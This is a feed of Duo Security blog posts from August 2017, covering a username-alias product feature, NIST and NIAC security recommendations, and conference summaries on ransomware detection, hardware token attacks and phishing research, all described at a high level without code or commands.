<![CDATA[Solving the Identity Crisis with Username Aliases]]> stevew@duosecurity.com(Steve Won) https://duo.com/blog/solving-the-identity-crisis-with-username-aliases https://duo.com/blog/solving-the-identity-crisis-with-username-aliases Product Updates Thu, 31 Aug 2017 08:00:00 -0400


  • Complex customer environments mean multiple usernames for each employee
  • Username Aliases introduces a total of up to five usernames per user object
  • Utilize via the GUI, AD Sync, Admin API, and CSV Upload
  • Feature available for Duo MFA, Duo Access, and Duo Beyond

In the three years I’ve spent at Duo, we’ve seen exponential growth in customers and size of customers. Thousands of customers deploy a consistent end user experience with Duo Push in hybrid environments with on-premises applications like Unix or Windows servers and cloud applications like Expensify and Slack.

As we’ve helped secure customers with tens of thousands of employees, we learned what our customers already knew: enterprise identity is complicated.

Identity Crisis

With all of those different on-premises and cloud applications, customers can’t guarantee that they all speak the same language for usernames. Usernames might be an email address, sAMAccountName, userPrincipalName, or even something custom like an HRID.

So consider an end user’s experience in the morning. They might log into a Windows or Mac laptop with domain\user, and then authenticate into a VPN with a UPN. But then when they open up Slack or another cloud application, they are most likely using sAMAccountName.

Sure, we had simple username normalization, where we cut off prefixes or suffixes and only accept the username. However, that turns out to be insufficient, particularly for multi-thousand user organizations, where any alphanumeric combination might be used on some service.

Now this was particularly problematic for Duo because our user objects only allowed one username. Our clever Sales Engineers came up with a workaround for customers: creating duplicate accounts of end users with the same username; however, this led to greater administrative overhead and pain for our customers.

We knew we could do better, so I’m pleased to announce Username Aliases.

The Solution

Username Aliases introduces four aliases on each user object for a total of five usernames. These objects are editable via the GUI and CSV upload.

Username Aliases

If you use Active Directory, we can now sync four additional columns with the custom attributes feature, so you can pull in any standard or custom attribute type as needed.

Username Aliases Attributes

We also support this via the Admin API, so you can programmatically update all your users.

Generally Available Now

Username Aliases is available for all Duo MFA, Duo Access, and Duo Beyond customers today.

We especially thank all of the customers that gave input and feedback during development and the beta period, so we could help solve this difficult challenge.

<![CDATA[New Critical Infrastructure Security Recommendations from NIAC]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/new-critical-infrastructure-security-recommendations-from-niac https://duo.com/blog/new-critical-infrastructure-security-recommendations-from-niac Industry News Mon, 28 Aug 2017 00:00:00 -0400

A White House advisory group, The President’s National Infrastructure Advisory Council (NIAC), has released an 11-step report urging the Administration to take action to protect against “a watershed, 9/11-level cyber attack.”

NIAC’s assessment is intended to measure how existing federal authorities could better support the cybersecurity of critical infrastructure assets that are at the greatest risk of a cyber attack and could result in catastrophic regional or national effects on public health or safety, economic security or national security.

In Securing Cyber Assets: Addressing Urgent Cyber Threats to Critical Infrastructure, the NIAC outlines recommendations and lists the applicable agencies that must take action to carry out the recommendation. Here’s a summary of the actions:

  1. Establish separate, secure communications networks specifically designated for the most critical cyber networks. Use “dark fiber” networks for critical control system traffic and reserved spectrum for backup communications during emergencies.
  2. Facilitate a private-sector-led pilot of machine-to-machine information sharing technologies to test public-private and company-to-company info sharing of cyber threats at network speed.
  3. Identify best-in-class scanning tools and assessment practices, and work with owners and operators of the most critical networks to scan and sanitize their systems on a voluntary basis.
  4. Strengthen the capabilities of today’s cyber workforce by sponsoring a public-private expert exchange program.
  5. Establish a set of limited time, outcome-based market incentives that encourage owners and operators to upgrade cyber infrastructure, invest in state-of-the-art technologies, and meet industry standards or best practices.
  6. Streamline and expedite security clearance process for owners of the nation’s most critical cyber assets, and expedite the siting, availability, and access of Sensitive Compartmented Information Facilities (SCIFs) to ensure cleared owners and operators can access secure facilities within one hour of a major threat or incident.
  7. Establish clear protocols to rapidly declassify cyber threat info and proactively share it with owners and operators of critical infrastructure, whose actions may provide the nation’s front line of defense against major cyber attacks.
  8. Pilot an operational task force of government, electricity, finance and communications industry experts to take decisive action on the nation’s cyber needs, with the speed and agility required of escalating cyber threats.
  9. Use the national-level GridEx IV exercise to test the detailed execution of Federal authorities and capabilities during a cyber incident, and identify and assign agency-specific recommendations to coordinate and clarify the Federal Government’s unclear response actions.
  10. Establish an optimum cybersecurity governance approach to direct and coordinate the cyber defense of the nation with resources/expertise from across federal agencies.
  11. Task the National Security Advisor to review the recommendations included in this report and within six months, convene a meeting of senior government officials to address barriers to implementation and identify next steps to move forward.

Recommendation 5 is particularly interesting, as it echoes a similar initiative enacted years ago within the healthcare industry to provide incentives to encourage the switch from paper records to digital systems, known as electronic healthcare record systems.

Creating market incentives to drive the adoption of upgraded IT/security infrastructure and to meet industry standards or best practices can assist in keeping critical U.S. infrastructure safe from known vulnerabilities that often exploit weaknesses in legacy systems and out-of-date software to gain access and steal and/or destroy data.

Last week, eight members of the 28-member NIAC resigned, claiming the current administration is not “adequately attentive to the pressing national security matters within the NIAC’s purview” nor “responsive to sound advice received from experts and advisors on these matters,” as stated in a copy of the resignation letter.

<![CDATA[The State of Real-Time Threat Detection]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/the-state-of-real-time-threat-detection https://duo.com/blog/the-state-of-real-time-threat-detection Duo Labs Fri, 25 Aug 2017 08:00:00 -0400

Ransomware has exploded in the past two years, as programs with names like Locky and Wannacry infect hosts in high-profile environments on a weekly basis. From power utilities to healthcare systems, ransomware indiscriminately encrypts all files on the victim’s computer and demands payments (usually in the form of cryptocurrency, like Bitcoin).

Tracking Desktop Ransomware Payments End to End

While the system is encrypting, the victim can potentially save their files by pulling the power cord, if they were able to realize they ran shady software in time. However, recent work presented at Black Hat 2017 by Elie Burszstein, Kylie McRoberts, and Luca Invernizzi showed that the median ransomware victim has less than one minute to react before all of their files are encrypted:

Ransomware Time from Infection to Encryption Source: elie.net

Worms have always been been focused on finding and infecting victims as soon as possible, ideally through systems that require no user interaction. The short time-to-compromise and time-to-spread of these types of malware means threat intelligence feeds have very little time to identify the indicators of compromise and distribute updates before a new variant could potentially infect scores of victims.

One approach that is often used in addition to intel feeds is real-time detection based on the behavior of a program. There have recently been advances in real-time detection presented at top security conferences, and they explore different strategies that may prove useful in other forms of malice-detection.

Tools to Fight Ransomware Attacks: ShieldFS

One potentially useful anti-ransomware tool that was presented at Black Hat 2017 was ShieldFS, created and presented by a group of researchers from Politecnico di Milano and Trend Micro. Subtitled, “The Last Word in Ransomware Resilient File Systems,” the insight in this project is applying machine learning (and the right type of machine learning) to operating-system-level file access patterns.

Implemented as a Windows filesystem filter, running in the kernel, ShieldFS isn’t a filesystem proper, but rather adds functionality to the underlying filesystem. Two common challenges in machine learning are feature engineering (how to come up with a list of descriptive “features” about the input) and feature selection (figuring out which of those features productively contribute to generating the correct answer).

Feature engineering in ShieldFS seemed straightforward, since many of the features were simple counts of types of events the filter observed, such as directory listings and writes. They were also fortunate that so many of the features showed obvious qualitative differences between malicious (red) and benign (blue) programs, making feature selection also a high-confidence process:

ShieldFS Features Source: shieldfs.necst.it

This sets the researchers up for success. Using binary inspection (called “static analysis”), they were able to supplement results based on operation statistics (“dynamic analysis”). The team implemented a multitiered machine learning model to preserve long-term trends but also be able to react to new behavioral patterns.

By using a copy-on-write policy, if a process started to exhibit ransomware behavior, they could kill it and restore all the copies. This system detected ransomware with a 96.9% success rate, but even the other 3.1% of cases still had the original content stored, so 100% of encrypted files were able to be restored.

One general takeaway from this project is the value in starting with easy-to-derive features before getting fancy, as is often the temptation in machine learning. Additionally, the biggest downside of dynamic analysis (observing the process) is that it’s hard to undo operations once you decide it’s malicious.

By tweaking the space-efficiency algorithm of copy-on-write, they establish the ability to completely restore all files to the state they were in at the start of the process, mitigating this downside, while avoiding the performance and accuracy penalty of statically analyzing the binary while stalling execution, which is a common anti-virus/endpoint-protection technique.

3D Printing Security Concerns

In a very different context, additive manufacturing, i.e., “3D printing,” a concern about malware has arisen, given that the printers are IoT devices. We see security vulnerabilities with embedded hardware and IoT devices all the time, such as Duo Labs’ recent work attacking a “smart” drill.

At USENIX Security 2017 this past week, a team from Georgia Tech and Rutgers presented a solution to this problem, titled, “See No Evil, Hear No Evil, Feel No Evil, Print No Evil? Malicious Fill Patterns Detection in Additive Manufacturing”. We recently criticized a solution that relied on the security of an open hardware project for just pushing the question of trust down a level, onto the physical components that the firmware runs on.

The USENIX work set aside entirely this “turtles all the way down” approach to trust, using side-channels to observe the behavior of the 3D printer and compare it to a model of what it should be doing. They establish three layers of verification that detect whether either the printer or the controlling computer are compromised (or broken): acoustic output, visual progress, and embedding nanoparticles in the materials so that fraudulent prints would look significantly different when imaged via, for example, a CT scan.

By printing the example prosthesis under assumed-good conditions, they were able to train machine learning models about what information legitimate printing leaked via these side channels. Using three different models of printer, they were able to achieve 100% accuracy at detecting modified printer behavior in real-time.

At the collocated Workshop On Offensive Technologies (WOOT), a different team, from Ben-Gurion University of the Negev, University of South Alabama, and Singapore University of Technology and Design, presented precisely such an attack. This paper, “dr0wned – Cyber-Physical Attack with Additive Manufacturing”, presented a start-to-finish attack on the reliability of a quadcopter rotor.

The attack started with a WinRAR vulnerability disguised as a PDF, which was previously patched, but was used because the team made the sadly reasonable assumption that the user doesn’t routinely update their computer. They also turned it into a worm, which scans for design files with the targeted geometry and comments-out critical lines to sabotage the parts. Successful sabotage of this type requires that the part holds up to visible inspection and some amount of physical testing:

Sabotaged 3D-Printed Propellers Source: usenix.net

In the above photo, the top propellor is the intended device, while the bottom one has been sabotaged. Their approach to sabotage is two-fold: inserting cavities at structurally weak points, and changing the printer’s path so that, instead of being printed in a continuous path across the boundary between the blades and the cap, the cap and two blades are printed as three separate parts that are stuck together, which creates a significant structural weakness.

In both lab and real-world testing, the sabotaged propeller blades eventually flew off when they rotated fast enough:

Broken 3D-Printed Propellers

The authors of this attack compared it to the previous state of the art in defense, which used acoustic detection methods with only a 77% success rate; they deem this “insufficient” for detection of this attack, which certainly seems like taking a rosy view. It would be fascinating to see these two research projects pitted against each other; the defenders are likely to have substantial success, because this attack relies on dramatically changing the path of the printer. The approach that used gold microrods in the material and imaged the result with a CT scan seems likely to detect substantial path changes, since this is precisely the attack the imaging was intended to detect.

In addition to the security properties tested by the detection work, it also provides a valuable quality analysis tool. By evaluating the printers as they print, these models can prevent the waste of valuable source material by halting the job as soon as the machine learning models indicate that the printer is malfunctioning.

While infosec defenders normally think of side-channels as something to loathe, since that’s how attackers can get information, in this case, the saying “a good defense is a strong offense” is accurate. By acting as an “attacker,” the producer of the plans is able to gain information about what the printer is actually doing in order to provide confidence in the integrity of the results. Moreover, it accomplishes this without having to put trust in any of the production hardware.

These are just two examples of advances in real-time detection of malicious software. When attacks on hardware erode the trust we in the software world place on it, new challenges arise that can’t be solved simply by using signature-based detection. In addition to the advances these research projects contributed in the individual fields of detection of ransomware and malfunctioning additive manufacturing tools, respectively, they discuss techniques that can apply to other machine learning scenarios in security.

Observing the actual effects of program execution (whether it be 3-D printer movements or filesystem actions) may prove to be more efficient than trying to analyze and reason about a program or data file.

<![CDATA[NIST’s New Security and Privacy Controls For IoT, MFA and SSO]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nists-new-security-and-privacy-controls-for-iot-mfa-and-sso https://duo.com/blog/nists-new-security-and-privacy-controls-for-iot-mfa-and-sso Industry News Tue, 22 Aug 2017 00:00:00 -0400

NIST has released the fifth revision of the Security and Privacy Controls draft of Special Publication 800-53 (PDF), now available for comments through September 12, 2017. The old draft was last fully rewrote in 2013.

In this draft, NIST has incorporated state-of-the-practice controls based on new threat intel, plus changed the structure of the controls to make them more outcome-based. They’ve also consolidated and integrated privacy controls into security controls, and clarified the relationship between security and privacy to improve control selection.

While the primary audience for this publication is federal agencies, they acknowledge that “different communities of interest” such as systems engineers, software developers, enterprise architects and business owners might want to use similar controls.

As a result, NIST has dropped “federal” from the title, as the document was formerly named, Security and Privacy Controls for Federal Information Systems and Organizations. NIST Fellow Ron Ross told Cyberscoop:

“The reality is, today we’re all of us — federal, state and local government and the private sector — using the same technologies … and facing the same [cyber] threats.”

Security and Privacy in An Interconnected World

NIST refers to the need to strengthen underlying infrastructure, information systems, components and services that support this new, interconnected world - specifically calling out the need for security and privacy controls in cloud and mobile systems and for Internet of Things (IoT) devices. As Draft NIST SP 800-53, Revision 5 puts it:

“As we push computers to “the edge” building an increasingly complex world of interconnected information systems and devices, security and privacy continue to dominate the national dialog.”

According to CPOMagazine, this is the first version of the Security and Privacy Controls that addresses how IoT is impacted by remote sensors and media collection devices (cameras, recorders and voice-activated controls). These are all components of IoT devices and systems, such as cars and traffic monitoring systems.

New Control Enhancements for Password-Based Authentication

While version four previously required enforcing minimum password complexity (including uppercase and lower-case letters, numbers, special characters etc.), draft five noticeably removes that requirement, focusing instead on allowing users to select long passwords/passphrases (page 113).

Read more about the password recommendation updates in the final version of SP 800-63B: Authentication & Lifecycle Management in another article I wrote, NIST Update: Passphrases In, Complex Passwords Out.

Security Benefits of Combining MFA & SSO

Within the Identification and Authentication control, the document carries on its recommendation to implement multi-factor authentication (MFA) for access to non-privileged accounts.

NIST also provides more supplemental guidance on the sub-control for single sign-on (SSO), commenting on SSO’s ability to “improve system security, for example by providing the ability to add multi-factor authentication for applications that may not be able to natively support this function. This situation may occur in legacy applications for systems.”

This shows NIST’s acknowledgement of the benefits of combining the productivity and usability gains of SSO with the strong authentication security provided by MFA - and not just for federal, but across many other industries that can leverage the same technology and systems to protect access to their applications.

Learn more about how Duo combines secure single sign-on and multi-factor authentication to ensure Trusted Users for organizations of every size, in every industry.

<![CDATA[Dissecting Security Hardware at Black Hat and DEF CON]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/dissecting-security-hardware-at-black-hat-and-def-con https://duo.com/blog/dissecting-security-hardware-at-black-hat-and-def-con Duo Labs Fri, 18 Aug 2017 08:00:00 -0400

One in seven USB drives with company data are lost or stolen, according to a survey recently conducted by Google’s Security, Privacy and Abuse Research team. A seemingly straightforward mitigation would be to mandate that all USB drives with corporate data use hardware-based encryption.

However, this still means that one in seven of those drives are going to get lost or stolen, so administrators have to implicitly place a lot of trust in that hardware. We also place trust in other secure hardware devices, like OTP tokens (e.g., RSA tokens) and Universal 2nd Factor (U2F) tokens (e.g., Yubico’s YubiKeys).

Due to the difficulty of verifying a device’s security properties, purchasing decisions often have to made based on secondary factors, like vendor reputation. This creates an environment where software-oriented people just assume hardware is secure because life becomes much more difficult if that assumption is questioned. Unfortunately, the reader’s life is about to become much more difficult.

Auditing USB Key Hardware Components

Elie Bursztein (@elie), Jean-Michel Picod (@jmichel_p), and Rémi Audebert (@halfr) recently presented “Attacking Encrypted USB Keys the Hard(Ware) Way” at Black Hat 2017, where they took on the challenging task of auditing the hardware components of encrypted USB keys. They established five possible types of weaknesses and demonstrated exploits of each type. This structure and presentation of the talk made it stand out in the field of talks, as it was accessible even to those who weren’t familiar with hardware security.

Secure Hardware

The number of times the word “FAIL” appeared in their slides is certainly indicative of the state of cryptographic hardware implementations. The most impactful takeaway is that they found that different models from a common manufacturer might have substantially different security postures—one might be suitable to protect against all but state-level actors, while another might be built such that even an opportunistic hacker can extract your data.

Vendor reputation is, apparently, not a reliable assumption when it comes to security properties, which means there’s even less information for buyers to use during the purchasing decision. Instead, the speakers concluded that NIST standards provide useful information—not conforming to the standards is likely a negative—but they aren’t sufficient to actually make claims about the security of a device.

This is left as an open question: we need better standards, so does anybody want to make them (and, more onerously, get everyone to agree on them)?

Counterfeiting Security Tokens

While the Google team pulled apart USB drives to audit them, Joe FitzPatrick (@securelyfitz) and Michael Leibowitz (@r00tkillah) detailed their efforts at producing counterfeit security tokens at DEF CON 25, in an entertaining talk titled, “Secure Tokin' and Doobiekeys: How to Roll Your Own Counterfeit Hardware Security Devices”.

The first victim was an OTP token, similar to an RSA token. They decided to completely ignore the secure hardware that stored the cryptographic seed, since that’s intended to be hard to break into. In the world of copyright law, there’s a concept known as the “analog loophole:” you can have all the DRM in the world, but at some point, you have to output an analog signal, i.e., sound or light waves, and those can be captured.

This team took a similar approach, and intercepted the signal going to the seven-segment LCD display. By waiting for all the segments to light up as different OTP codes are displayed, they were able to deduce that a given signal on a given pin meant that a particular segment was going to turn on or off.

By packing this detection logic and a Bluetooth transmitter into the token’s housing, they could broadcast the state of the display without ever having to semantically understand what the current OTP code was. This attack would require access to the victim’s OTP token, so the threat model requires an attacker to have physical access to the token for at least several minutes, which, if you’re taking good care of your tokens, would probably only happen when you’re asleep.

A successful attack would allow malicious attackers within Bluetooth range (at most, 100 meters if you have line-of-sight view of the token) to know your OTP codes as they were generated. Then, all they would have to do is phish your login credentials to gain persistent access to the account the token protects.

Their second hack was producing a counterfeit YubiKey U2F token. The advantage in doing so is that the “identity” of the key is burned in when it ships, and the security relies on that staying secret. If a malicious actor is able to retain the secret information that they burn into a fake YubiKey, and then convince a user that it’s a legitimate YubiKey, they can later impersonate that token.

Fitzpatrick and Leibowitz showed their incremental attempts at shrinking their PCB and components to fit into a YubiKey form factor. They were able to 3D print a Yubikey replica that could hold their counterfeit circuit board, and demonstrated that Yubico’s tools treated it like any other YubiKey. This attack could be implemented in the supply chain, by swapping out authentic YubiKeys for these fakes, but supply chain interference is always a difficult task. A more feasible scenario, if the attacker has specific targets, would be to hand them out as a “public service” at an infosec event.

Seeking Hardware Transparency

These attacks certainly serve to instill some distrust of “secure hardware,” which raises the question of: “What do we do when we don’t trust the circuitry and firmware?” One possible approach using open-source hardware was described by 0ctane in their DEF CON talk, “Untrustworthy Hardware and How To Fix It: Seeking Hardware Transparency”.

Often, the notion of “open-source hardware” sounds like a great idea, except for the not-so-tiny complication of actually producing the hardware from the specifications. Recent advances in consumer-grade CNC machines have started to make homemade printed circuit boards (PCBs) feasible, but it’s still time- and material-intensive to iterate.

Field-programmable gate arrays (FPGAs) are one option in this situation. An FPGA is a piece of hardware that can best be likened to software-defined microchip: the user sends a definition of the circuitry they want, and the FPGA configures itself to implement that hardware definition. They are usually used for prototyping, debugging hardware, or performing complex digital signal processing. The curious reader may be interested in taking a deeper dive into what FGPAs actually are, but that’s beyond the scope of this discussion.

0ctane proposes a cryptographic purpose: simulating a particular definition of a trusted CPU (in this case, OpenRISC), and running Linux and the desired cryptographic software on top of this simulated processor. The downside to using FPGAs is that the customizability comes at the cost of speed, when compared to silicon CPUs. Top-of-the-line FPGAs still run slower due to the need to buffer input and output between the cells, rather than the circuitry being optimally laid out, as is the case for a silicon chip.

For this application, however, that might be an entirely acceptable tradeoff: slower operation and computation in exchange for knowing that your code is running on a trusted stack, from the hardware up. In addition, there are some unanswered questions as to how sound this approach is. It’s unclear to the author whether an FPGA is harder for an attacker to surreptitiously insert malicious logic than it is with a CPU, since this approach requires trusting the FPGA and its programmer software (running on an untrusted CPU).

There’s also an assumption made that OpenRISC is itself more secure than an Intel or AMD x86 chip. As we’ve seen in case after case, just being open-source doesn’t mean that software is more secure. It does provide visibility that you don’t otherwise have, but you either have to read all the software and convince yourself of its security properties, or you have to also place trust in the OpenRISC project to make a secure processor. 0ctane’s proposal is an interesting one, but it needs more data and discussion to be a viable approach; we look forward to hearing more from them in the future.

FPGAs aren’t the solution to all of our concerns about hardware security, and you have to place your trust somewhere, unless you can oversee the entire design and supply chain. This approach could potentially be valuable in the future when trusted hardware is essential, such as a standalone code-signing computer with the keys in a hardware security module, which are designed to break before revealing their private information. There are definitely issues with this solution as it stands, though. Hardware hackers are a tenacious bunch, such as when Mikhail on our research team hacked our office doors. In reality, there doesn’t seem to be much of a supply-chain threat if you’re buying your hardware from a trusted supplier. However, you might want to think twice before using a YuibKey that somebody hands you at a crypto meetup...

<![CDATA[Phishing Emails Leverage Recently Patched Windows Vulnerability]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/phishing-emails-leverage-recently-patched-windows-vulnerability https://duo.com/blog/phishing-emails-leverage-recently-patched-windows-vulnerability Industry News Thu, 17 Aug 2017 00:00:00 -0400

A recently patched, high-severity Windows vulnerability, CVE-2017-0199, is being used in phishing attacks to deliver malware to users.

CVE-2017-0199 exploits a flaw in the Windows Object Linking and Embedding (OLE) Microsoft Office interface, allowing an attacker to take control of systems, steal or destroy data, and retrieve malicious files from a remote server and install them on a victim’s computer.

In a report from Kaspersky Lab, the number of attacked Microsoft Office users rose to 1.5 million in Q2 of this year. They found that 71% of all attacks on Microsoft Office users were carried out using this specific vulnerability, despite it being patched in April.

Targeting Electronics Manufacturing Companies

A new attack in the wild is using the vulnerability to target mainly electronics manufacturing companies. A phishing email appeared to be sent from a cable manufacturing provider, containing a malicious PowerPoint Slideshow (.ppsx) attachment, according to Trend Micro researchers.

Phishing Email Disguised as Purchase Order

Source: Trend Micro

Once a user opens the PowerPoint file, the PowerPoint Show animations feature runs, downloading an XML file that runs PowerShell commands to download and execute a remote access Trojan (RAT).

In another analysis of a separate attack using the same Windows vulnerability, a phishing email refers to a Microsoft Word attachment as a purchase order, urging the reader to open and reply in order to make the shipment.

Attackers combined the use of an older vulnerability with a newer one, likely to avoid a Word user prompt that could tip off user suspicion, according to the Talos blog, which outlines the technical reasons why the attack wasn’t successful.

Update Microsoft Systems To Protect Them

While phishing still targets the weakest link - the user - there are still other defenses organizations can take to reduce the impact or success of a phishing attempt. One way is to practice basic security hygiene by patching your systems with the latest updates in order to protect against these attacks. This particular CVE is addressed by Microsoft’s April updates.

In an analysis of Duo’s data on devices across enterprises in every industry, we found that 59% of endpoints are running an older version of the Microsoft operating system, Windows 7. Older versions, if not patched, may leave enterprises vulnerable to known flaws that make it easier to compromise machines and steal data. Get more device insights in The 2017 Duo Trusted Access Report.

Phishing in the 2017 Duo Trusted Access Report

Microsoft has announced the end of support for Windows 7 by Jan. 14, 2020, and warns against using it; urging enterprises to migrate to Windows 10. The software giant cites higher operating costs, increased maintenance, and time lost due to attacks on its long-outdated security architecture as reasons to make the switch.

Learn more about how phishing attacks work in The Trouble With Phishing, a guide that details the problems around phishing, how it works, and how Duo can be leveraged as a solution.

<![CDATA[Security Anthropology: How Do Organizations Differ?]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/security-anthropology-how-do-organizations-differ https://duo.com/blog/security-anthropology-how-do-organizations-differ Industry News Mon, 14 Aug 2017 08:00:00 -0400

During Duo’s Second Wind Breakfast in Las Vegas last month, I talked about how we as security professionals might be under the impression that our users and customers are visitors to our Tech Country, when in reality it might be that we are visitors to their Business Country. And if that’s the case, we won’t be understood simply by speaking our own language More Loudly, or in Their Accent. Not only do we have to speak their actual native language, but we need to be able to think in it, and understand all the culture that goes with it.

I was talking earlier with our CEO, Dug Song, who has a way with words (as well as actions). He used the phrase “security anthropology” to describe what we need to understand about our customers and their organizations, and the idea really captured my imagination. We have marketing and sales personas for individuals in security, such as the CISO, the IT administrator, the developer, and the end user. But what if we researched personas for organizations in order to understand better how they approach security issues?

Just like people occupying roles, the organizations themselves vary widely. They have different types of business drivers, priorities, constraints, and capabilities. Large tech companies can drop hints about security fixes they’d like to see and markets move; public sector agencies are at the mercy of the next budget wrangling session in the legislature. An 80-year-old manufacturing company may not care what cute new IoT ideas you might have. An organization located in sparsely populated areas may have less reliable Internet connectivity, thanks to squirrels or avalanches (or avalanches of squirrels — it could happen).

When it comes to security, entities have different threat profiles: the 2015 Verizon DBIR showed that even companies in the same industry can have more threats in common with other verticals than with one another.

Many enterprises today try to figure out their security strategies through peer benchmarking: what are our peers doing, and should we be doing the same? There are several problems with relying on classic benchmarking:

  • What if your peers are really bad at security?
  • What if your management argues that you don’t have to do any more than your peers are doing?
  • How do you really know who your peers are for the purposes of security planning?

By researching organizational personas for security, I’m hoping to find a better answer to that last question. Security decisions are not made simply by looking at other companies in the same industry, because there are many other variables that come into play. The number of users matters, but scale isn’t just grounded in numbers of users; it also means the number of business partners, volume and speed of transactions and operations, complexity of infrastructure, geographical distribution, and much more.

Pick any given entity designated “healthcare,” and if it’s a research organization, it’s not going to have the same threat models and priorities as another one where actual people are bleeding inside the buildings. (Intellectual property is important to protect, but given the choice between hiring another IT person and hiring another nurse, most hospitals are going to go with the latter. And if I’m the one in the hospital bed, I will probably applaud that decision.)

We still have too many “one size fits all” prescriptions for security that don’t fit real-life enterprises; not everyone can or should be seeking the “NSA level” of maturity. By building a security anthropology model for comparing organizations, I hope we can design even better products and services to align with their needs, as well as help the security community speak the language of the users it’s serving. If you know of similar research in this area, or would like to contribute, please feel free to contact me, and stay tuned for more blog posts on this topic.

<![CDATA[Examining Security Science at Black Hat 2017]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/examining-security-science-at-black-hat-2017 https://duo.com/blog/examining-security-science-at-black-hat-2017 Duo Labs Fri, 11 Aug 2017 08:00:00 -0400

Daniel Kahneman, in his 2011 book “Thinking, Fast and Slow,” describes two modes of thought: “System 1,” the fast, emotional, instinctual system, and “System 2,” the slow, rational, deliberative system. System 1 is more efficient at quick decisions, but concepts like information security aren’t incorporated.

In her Black Hat 2017 talk “Ichthyology, Phishing as a Science,” Stripe Security Engineer Carla Burnett (@tetrakazi) uses this model of human cognition to plan, develop, and execute phishing attacks against other users within Stripe. Of course, she’s not out to actually collect credentials, but to train internal users about what clever types of phishing might hit their inboxes. System 2, the logical, observant system, won’t have time to kick in unless a user is already suspicious of the email in question.

Burnett establishes a taxonomy of types of phishing to make discussion clear, something that’s essential for scientific discussion, based on which action she wants the user to take: perform an external action, install an exploit, or hand over credentials (the archetype of phishing). By splitting thought processes into the two system, she’s able to explain surprising results.

For example, Github sends plaintext emails. Burnett sent a phish with the exact same (lack of) styling, and had only 10% conversion (as we steal the term “conversion” from marketing to mean, in this case, the user doing whatever action the phisher desires, agnostic of whether it’s handing over credentials, approving an OAuth application, etc.). By using HTML emails with design elements from github.com, she was able to boost her conversion rate to 50%, even though there aren’t actually any legitimate emails that look like that.

The key was tricking System 1 into feeling good about the email and clicking it before System 2 kicked in. Since current SaaS email conventions include sending substantially styled emails, a plaintext email probably confuses System 1 enough that System 2 has time to rationally evaluate the email.

Real Humans, Simulated Attacks

Another speaker implicitly discussed this psychological dynamic during another Black Hat talk, “Real Humans, Simulated Attacks,” by Dr. Lorrie Cranor (@lorrietweet), Professor of Computer Science at Carnegie Mellon. Dr. Cranor discussed the difficulty in conducting scientifically valid security usability studies. The biggest obstacle in experiment design is that you often can’t have a real adversary to challenge users.

One intuitive type of study to conduct is to have users engage in security tasks, such as telling them that they are going to look at TLS warnings and determine whether it’s safe to continue. The structural problem with this is that the researcher has then primed users to ignore what their System 1 thoughts tell them to do when they do get the TLS warning, and they go straight to the System 2 evaluation of the situation.

In an ideal world, you could actually observe users interacting with security systems in the wild without knowing that their security behavior is being monitored. Cranor described a project her group is working on: measuring the rollout of Duo’s software across their campus system. Using our Admin API, they can pull data about the number of enrolled users and which factors and integrations they use — all without notifying them that they’re being studied. Done anonymously, this also can minimize privacy concerns. This type of project is something that Duo Labs is also currently working on, except we’re looking across all customers and industries, not just one educational institution.

The middle ground that Cranor’s group pursues is clever: minorly deceive the user and make them think they’re doing a study for some other purpose. This raises ethical issues, and researchers generally have to weigh the benefits and necessity of the lie, and then debrief the user afterward about what they lied about and why it was necessary. In many research institutions, studies involving human subjects have to be approved by an independent review board to ensure ethical behavior.

An example of this is to prompt the user to buy something on Amazon and then send them a phishing confirmation email. The overall situation is artificial, but the user is primed to be thinking about their retail experience, so the phish hits their System 1 perception. In a non-security scenario, users swat away warnings, as compared to when they’re told that their security perceptions are being studied.

Carla Burnett from Stripe found this out in practice, when she sent out the Github phish, and noted that 50% of users copy and pasted their passwords into the phishing site. That means that 50% of users got their password from a password manager, which certainly is encouraging, but password managers don’t work if the domain doesn’t match the original domain — a key sign of phishing.

These users clicked on their password manager, weren’t alarmed by the lack of a domain match, and went searching for their Github password by hand. This is evidence of a key education failure regarding password managers (or that password managers don’t always provide the right password, so users have been trained to not trust them). Despite the presence of a warning sign (no autocomplete/suggested password for that domain), their users ignored the implications and opened themselves up to exploitation.

Lessons for the Security Community

Conducting sound usability studies is a real struggle, and one that we too often treat casually. Asking users what they think about a security system will always gets the result of this System 2 analytical thinking, not the gut-feeling what-do-you-do-when-you’re-annoyed-by-security actions.

As a security community, we need to be cognizant of the biases toward thoughtfulness that slip into hypothetical security studies.

There’s tremendous value in “hallway testing,” and people developing security products should definitely have informal and formal hypothetical studies as tools in their metaphorical toolbox. These studies are relatively low cost, particularly hallway testing, which might take only a few minutes.

However, the nature of these methods makes it difficult to assess how System 1 would treat a situation. The holy grail, of course, is observation of real-world behavior of the actual users we’re trying to protect, but that’s not always practical (or ethical!). If it isn’t, we should confirm findings from hypothetical scenarios with studies that don’t prepare users to be particularly security-conscious to make sure we observe users’ System 1 reactions.

<![CDATA[Lights, Camera, Action: The Making of Duo's First In-House Commercial]]> rcordero@duo.com(Rik Cordero) https://duo.com/blog/lights-camera-action-the-making-of-duos-first-in-house-commercial https://duo.com/blog/lights-camera-action-the-making-of-duos-first-in-house-commercial Press and Events Thu, 10 Aug 2017 09:00:00 -0400

In late 2016, Duo’s creative team had the idea to shoot our first broadcast quality commercial - affectionately codenamed “Duo Vs. Everybody.” Because IT security products have traditionally been as cumbersome as the networks they're trying to secure, we wanted to play with the idea that you don't solve complexity by adding more complexity.

Duo has produced our own videos since 2013, but this project was the first to include professional actors and a full video crew in addition to the in-house talent at Duo. This was by far the most complex and extensive production in Duo’s long history of making great video content:


What began as a one-paragraph treatment eventually blossomed into a 32-page behemoth slide presentation that we pitched to the stakeholders within our marketing team. Was it overkill? Perhaps. But from our experience, it was important to pitch our concept with the same level of passion and tenacity as an outside creative agency.

Our goal was to capture an entertaining look at the dichotomy between deploying Duo and Everybody Else (a hardware-based solution). By the end of the spot, we wanted to prove that better security means a better lifestyle.

Because Duo is a brand that our creative team knows inside and out, the challenge was to tell a story that would connect to a wide audience, not just our tech security peers. From there, we managed logistics and applied our collective commercial experience into a high-end ad spot.

One of our actors gets ready for her close-up

